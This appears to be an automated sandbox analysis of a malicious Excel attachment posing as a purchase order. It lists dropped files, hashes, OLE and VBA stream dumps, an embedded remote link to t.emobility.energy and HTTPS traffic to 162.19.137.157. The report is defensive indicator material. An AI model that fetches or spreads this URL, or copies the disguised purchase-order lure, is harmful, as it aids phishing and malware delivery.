                                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                    File Type:ASCII text, with very long lines (28799), with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):261360
                                    Entropy (8bit):5.150946418525623
                                    Encrypted:false
                                    SSDEEP:1536:+yjmk2lqze636Nouywz+7qZkIt0jbmTKdYtHMd347btcZkb3N9FDDBukbcxdgsM5:NSkr6NOwz4gp99ZBr7LvJ
                                    MD5:C9366DF5AC8EB603F9336596ECD03F34
                                    SHA1:CD1D64283F94C067813C86910348BED2D88EB2FF
                                    SHA-256:AC8416C2DEACE647FED00ADA1E2CFB032DC20BFF5A0CDA1830CBA02D55FE7BE2
                                    SHA-512:EB9276268D882A7D9344231A5D9BAFE367A9D17651F433BA31BF704713BBED1A8DD2D1C31B656E930AD68E8FD14DA7464DD9151D30A2389421B4D5B07B1F3B2C
                                    Malicious:false
                                    Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..03/25/2025 16:51:32.494.EXCEL (0x19DC).0x1C98.Microsoft Excel.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Experimentation.FeatureQueryBatched","Flags":33777005812056321,"InternalSequenceNumber":17,"Time":"2025-03-25T16:51:32.494Z","Data.Sequence":0,"Data.Count":128,"Data.Features":"[ { \"ID\" : 1, \"N\" : \"Microsoft.Office.Telemetry.TrackCPSWrites\", \"V\" : false, \"S\" : 1, \"P\" : 0, \"T\" : \"2025-03-25T16:51:32.2600636Z\", \"C\" : \"33\", \"Q\" : 0.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 1, \"N\" : \"Microsoft.Office.Telemetry.CPSMaxWrites\", \"V\" : 2, \"S\" : 1, \"P\" : 0, \"T\" : \"2025-03-25T16:51:32.2600636Z\", \"C\" : \"33\", \"Q\" : 0.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 1, \"N\" : \"Microsoft.Office.Word.UAEOnSafeModeEnabled\", \"V\" : true, \"S\" : 1, \"P\" : 0, \"T\" : \"2025-03-25T16:51:32.2600636Z\", \"C\" : \"\", \"Q\" : 7.0, \"M\" : 0, \"F\" : 5, \"G\" : \"Opt\" }, { \"ID\" : 1, \"
                                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):512
                                    Entropy (8bit):0.0
                                    Encrypted:false
                                    SSDEEP:3::
                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                    Malicious:false
                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):165
                                    Entropy (8bit):1.4377382811115937
                                    Encrypted:false
                                    SSDEEP:3:ZaFuMulv:ZaFutv
                                    MD5:FBC4AD8A314E46493E8D3E9CABCCC98F
                                    SHA1:2B63B4CE7BDDE94EE0340E9F889E9DD51F7CF5F1
                                    SHA-256:7A3B16347DDDFCB28958C144FD51FFFC60301893AA3327708F698771F628FBD7
                                    SHA-512:7D570241B7B9DD20B443BF3CE2CFB1989A603DAB40ED33ED440D6AB5486E68898A622041280D60F41CF450B1E07F465F7DE1C416493EECE5E31AA2577A3C91B3
                                    Malicious:true
                                    Preview:.user ..H.a.n.z.o. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Mar 25 10:25:39 2025, Security: 1
                                    Entropy (8bit):7.982615142561084
                                    TrID:
                                    • Microsoft Excel sheet (30009/1) 47.99%
                                    • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                    • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                    File name:PURCHASE ORDER 5172025.xla.xlsx
                                    File size:1'268'224 bytes
                                    MD5:e79caec024d0abddc288e30c2c974945
                                    SHA1:2e56b64b76874ae950f7d71b115fff184e0b33f3
                                    SHA256:fb12a393e8260ef0e83bb670f86e19ce598b14bb9bbb8f90d27b573a310180f5
                                    SHA512:b4870c6be966a5c016f5a16d911bfb792c43a6f1c78b8cfe34bf989e01479ed4b845dfd9d356303985063988d8f18524cfe65abe08d68ffd851fdbb927bb2267
                                    SSDEEP:24576:YN/dT0Hr47PD4UTqRgJ+pn0M9cWNVDfrsnlf:YNFTs4DD4hg00MtDDTM1
                                    TLSH:694523A87BC1CFA6C5FB55FD48A6A9154006FCC0A26B97477241B7CE7530378838B68B
                                    File Content Preview:........................>...................................v...................................................................................y.......{......................................................................................................
                                    Icon Hash:35e58a8c0c8a85b9
                                    Document Type:OLE
                                    Number of OLE Files:1
                                    Has Summary Info:
                                    Application Name:Microsoft Excel
                                    Encrypted Document:True
                                    Contains Word Document Stream:False
                                    Contains Workbook/Book Stream:True
                                    Contains PowerPoint Document Stream:False
                                    Contains Visio Document Stream:False
                                    Contains ObjectPool Stream:False
                                    Flash Objects Count:0
                                    Contains VBA Macros:True
                                    Code Page:1252
                                    Author:
                                    Last Saved By:
                                    Create Time:2006-09-16 00:00:00
                                    Last Saved Time:2025-03-25 10:25:39
                                    Creating Application:Microsoft Excel
                                    Security:1
                                    Document Code Page:1252
                                    Thumbnail Scaling Desired:False
                                    Contains Dirty Links:False
                                    Shared Document:False
                                    Changed Hyperlinks:False
                                    Application Version:786432
                                    General
                                    Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                    VBA File Name:Sheet1.cls
                                    Stream Size:977
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
                                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 bd e1 ca 7f 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                    Attribute VB_Name = "Sheet1"
                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                    Attribute VB_GlobalNameSpace = False
                                    Attribute VB_Creatable = False
                                    Attribute VB_PredeclaredId = True
                                    Attribute VB_Exposed = True
                                    Attribute VB_TemplateDerived = False
                                    Attribute VB_Customizable = True
                                    

                                    General
                                    Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                    VBA File Name:Sheet2.cls
                                    Stream Size:977
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
                                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 bd e1 e5 40 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                    Attribute VB_Name = "Sheet2"
                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                    Attribute VB_GlobalNameSpace = False
                                    Attribute VB_Creatable = False
                                    Attribute VB_PredeclaredId = True
                                    Attribute VB_Exposed = True
                                    Attribute VB_TemplateDerived = False
                                    Attribute VB_Customizable = True
                                    

                                    General
                                    Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                    VBA File Name:Sheet3.cls
                                    Stream Size:977
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . i . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 bd e1 69 15 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                    Attribute VB_Name = "Sheet3"
                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                    Attribute VB_GlobalNameSpace = False
                                    Attribute VB_Creatable = False
                                    Attribute VB_PredeclaredId = True
                                    Attribute VB_Exposed = True
                                    Attribute VB_TemplateDerived = False
                                    Attribute VB_Customizable = True
                                    

                                    General
                                    Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                    VBA File Name:ThisWorkbook.cls
                                    Stream Size:985
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . t 1 . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
                                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 bd e1 74 31 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                    Attribute VB_Name = "ThisWorkbook"
                                    Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                    Attribute VB_GlobalNameSpace = False
                                    Attribute VB_Creatable = False
                                    Attribute VB_PredeclaredId = True
                                    Attribute VB_Exposed = True
                                    Attribute VB_TemplateDerived = False
                                    Attribute VB_Customizable = True
                                    

                                    General
                                    Stream Path:\x1CompObj
                                    CLSID:
                                    File Type:data
                                    Stream Size:114
                                    Entropy:4.25248375192737
                                    Base64 Encoded:True
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                    General
                                    Stream Path:\x5DocumentSummaryInformation
                                    CLSID:
                                    File Type:data
                                    Stream Size:244
                                    Entropy:2.889430592781307
                                    Base64 Encoded:False
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                    General
                                    Stream Path:\x5SummaryInformation
                                    CLSID:
                                    File Type:data
                                    Stream Size:200
                                    Entropy:3.2603503175049817
                                    Base64 Encoded:False
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . S . A p . . . . . . . . .
                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                    General
                                    Stream Path:MBD00A6776E/\x1CompObj
                                    CLSID:
                                    File Type:data
                                    Stream Size:99
                                    Entropy:3.631242196770981
                                    Base64 Encoded:False
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                    General
                                    Stream Path:MBD00A6776E/Package
                                    CLSID:
                                    File Type:Microsoft Excel 2007+
                                    Stream Size:1099154
                                    Entropy:7.995034746087403
                                    Base64 Encoded:True
                                    Data ASCII:P K . . . . . . . . . . ! . w 1 . . . . j . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                    Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 77 31 d5 0e e3 01 00 00 6a 08 00 00 13 00 cd 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 c9 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                    General
                                    Stream Path:MBD00A6776F/\x1Ole
                                    CLSID:
                                    File Type:data
                                    Stream Size:494
                                    Entropy:5.845279778686223
                                    Base64 Encoded:False
                                    Data ASCII:. . . . H . . . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . t . . . e . m . o . b . i . l . i . t . y . . . e . n . e . r . g . y . / . k . q . Q . 8 . b . I . . . i 2 h A $ . 9 v . M . | " | . ^ } . . . 2 . . p 4 1 = M [ z T E ^ ~ I i . - = . A X ' ` . . r G | p . B ' $ G * z F v . \\ x w Y Y n B Z X " ] \\ H . l $ W J d , W | J . S A / g } . ] . . . . . . . . . . . . . . . . . . . Z . D . L . b . T . 8 . c . a . d . B . E . l . R . x . 8 . V . v . N . 0 . Y . M . s . R .
                                    Data Raw:01 00 00 02 8f 48 a6 20 03 b0 a1 13 00 00 00 00 00 00 00 00 00 00 00 00 f6 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b f2 00 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 74 00 2e 00 65 00 6d 00 6f 00 62 00 69 00 6c 00 69 00 74 00 79 00 2e 00 65 00 6e 00 65 00 72 00 67 00 79 00 2f 00 6b 00 71 00 51 00 38 00 62 00 49 00 00 00 69 df 32 68 8c dc 41 24 13 39 fb 76
                                    General
                                    Stream Path:Workbook
                                    CLSID:
                                    File Type:Applesoft BASIC program data, first line number 16
                                    Stream Size:144844
                                    Entropy:7.99545252584344
                                    Base64 Encoded:True
                                    Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . . ; / @ ] ; ] X . . . 2 z u : Z 6 . : . ~ . : @ D o . * E . ~ } . . . . . . . . . . . U . . . \\ . p . . W g b O . l N f y I . : ~ . . . U 6 . p ; Z z " N 3 j ] > . ` , . 4 . 0 . # ^ . F v ! . g e b e V q . T o . . C h G B . . . a . . . " . . . = . . . . x . . . n Y : . . ; o . j . . . . . . . . . . . y a . . . . w . . . . . . . = . . . X ^ . . ? O 5 . i G @ . . . . . . . } " . . . L r . . . . . . . r . . . A 1 . . . w R ? ( Y " G j k r . . > . e . 1 .
                                    Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 18 3b 2f 40 f2 5d 3b 5d 58 d7 9a 01 ef cf 85 ec 32 7a af 75 3a 5a e4 f3 36 d5 a5 3a 1d 7e 7f 3a 84 40 ac 44 6f 0e 2a 9a 20 45 f5 dc 9a 7e 7d 12 87 00 00 00 e1 00 02 00 b0 04 c1 00 02 00 55 b0 e2 00 00 00 5c 00 70 00 aa b5 e6 a6 b9 f0 57 67 62 94 4f 1b ba 6c 4e d1 cb d8 66 f9 e2 79 b6 a0 49 d8
                                    General
                                    Stream Path:_VBA_PROJECT_CUR/PROJECT
                                    CLSID:
                                    File Type:ASCII text, with CRLF line terminators
                                    Stream Size:531
                                    Entropy:5.22065657326829
                                    Base64 Encoded:True
                                    Data ASCII:I D = " { 1 2 F 7 0 6 2 C - 6 A 4 9 - 4 1 0 5 - B F D 6 - F 4 8 3 3 1 8 3 3 3 5 E } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " C 7 C 5 6 C A 4 9 4 A C 6 C B 0 6
                                    Data Raw:49 44 3d 22 7b 31 32 46 37 30 36 32 43 2d 36 41 34 39 2d 34 31 30 35 2d 42 46 44 36 2d 46 34 38 33 33 31 38 33 33 33 35 45 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                    General
                                    Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                    CLSID:
                                    File Type:data
                                    Stream Size:104
                                    Entropy:3.0488640812019017
                                    Base64 Encoded:False
                                    Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                    Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                    General
                                    Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                    CLSID:
                                    File Type:data
                                    Stream Size:2644
                                    Entropy:3.989996811732665
                                    Base64 Encoded:False
                                    Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                    Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                    General
                                    Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                    CLSID:
                                    File Type:data
                                    Stream Size:553
                                    Entropy:6.357006260243376
                                    Base64 Encoded:True
                                    Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . S . i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2
                                    Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 53 12 fa 69 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                                    Download Network PCAP: filteredfull

                                    • Total Packets: 46
                                    • 443 (HTTPS)
                                    • 53 (DNS)
                                    TimestampSource PortDest PortSource IPDest IP
                                    Mar 25, 2025 17:51:09.285326958 CET49723443192.168.2.27162.19.137.157
                                    Mar 25, 2025 17:51:09.285372019 CET44349723162.19.137.157192.168.2.27
                                    Mar 25, 2025 17:51:09.285501003 CET49723443192.168.2.27162.19.137.157
                                    Mar 25, 2025 17:51:09.286550999 CET49723443192.168.2.27162.19.137.157
                                    Mar 25, 2025 17:51:09.286569118 CET44349723162.19.137.157192.168.2.27
                                    Mar 25, 2025 17:51:09.680623055 CET44349723162.19.137.157192.168.2.27
                                    Mar 25, 2025 17:51:09.680818081 CET49723443192.168.2.27162.19.137.157
                                    Mar 25, 2025 17:51:09.686080933 CET49723443192.168.2.27162.19.137.157
                                    Mar 25, 2025 17:51:09.686088085 CET44349723162.19.137.157192.168.2.27
                                    Mar 25, 2025 17:51:09.687295914 CET44349723162.19.137.157192.168.2.27
                                    Mar 25, 2025 17:51:09.687374115 CET49723443192.168.2.27162.19.137.157
                                    Mar 25, 2025 17:51:09.688914061 CET49723443192.168.2.27162.19.137.157
                                    Mar 25, 2025 17:51:09.689302921 CET44349723162.19.137.157192.168.2.27
                                    Mar 25, 2025 17:51:09.689507961 CET49723443192.168.2.27162.19.137.157
                                    Mar 25, 2025 17:51:09.689516068 CET44349723162.19.137.157192.168.2.27
                                    Mar 25, 2025 17:51:09.689694881 CET49723443192.168.2.27162.19.137.157
                                    Mar 25, 2025 17:51:09.690588951 CET49723443192.168.2.27162.19.137.157
                                    Mar 25, 2025 17:51:09.732275009 CET44349723162.19.137.157192.168.2.27
                                    Mar 25, 2025 17:51:10.077702999 CET44349723162.19.137.157192.168.2.27
                                    Mar 25, 2025 17:51:10.077790022 CET44349723162.19.137.157192.168.2.27
                                    Mar 25, 2025 17:51:10.077903986 CET49723443192.168.2.27162.19.137.157
                                    Mar 25, 2025 17:51:10.084120035 CET49723443192.168.2.27162.19.137.157
                                    Mar 25, 2025 17:51:10.084135056 CET44349723162.19.137.157192.168.2.27
                                    Mar 25, 2025 17:51:10.086297989 CET49724443192.168.2.27162.19.137.157
                                    Mar 25, 2025 17:51:10.086319923 CET44349724162.19.137.157192.168.2.27
                                    Mar 25, 2025 17:51:10.086477041 CET49724443192.168.2.27162.19.137.157
                                    Mar 25, 2025 17:51:10.087414980 CET49724443192.168.2.27162.19.137.157
                                    Mar 25, 2025 17:51:10.087425947 CET44349724162.19.137.157192.168.2.27
                                    Mar 25, 2025 17:51:10.462282896 CET44349724162.19.137.157192.168.2.27
                                    Mar 25, 2025 17:51:10.462791920 CET49724443192.168.2.27162.19.137.157
                                    Mar 25, 2025 17:51:10.463980913 CET49724443192.168.2.27162.19.137.157
                                    Mar 25, 2025 17:51:10.463985920 CET44349724162.19.137.157192.168.2.27
                                    Mar 25, 2025 17:51:10.464361906 CET44349724162.19.137.157192.168.2.27
                                    Mar 25, 2025 17:51:10.464431047 CET49724443192.168.2.27162.19.137.157
                                    Mar 25, 2025 17:51:10.466022015 CET49724443192.168.2.27162.19.137.157
                                    Mar 25, 2025 17:51:10.466090918 CET44349724162.19.137.157192.168.2.27
                                    Mar 25, 2025 17:51:10.466140032 CET49724443192.168.2.27162.19.137.157
                                    Mar 25, 2025 17:51:10.466140032 CET49724443192.168.2.27162.19.137.157
                                    Mar 25, 2025 17:51:10.512280941 CET44349724162.19.137.157192.168.2.27
                                    Mar 25, 2025 17:51:10.843539000 CET44349724162.19.137.157192.168.2.27
                                    Mar 25, 2025 17:51:10.843574047 CET44349724162.19.137.157192.168.2.27
                                    Mar 25, 2025 17:51:10.843647003 CET44349724162.19.137.157192.168.2.27
                                    Mar 25, 2025 17:51:10.843717098 CET49724443192.168.2.27162.19.137.157
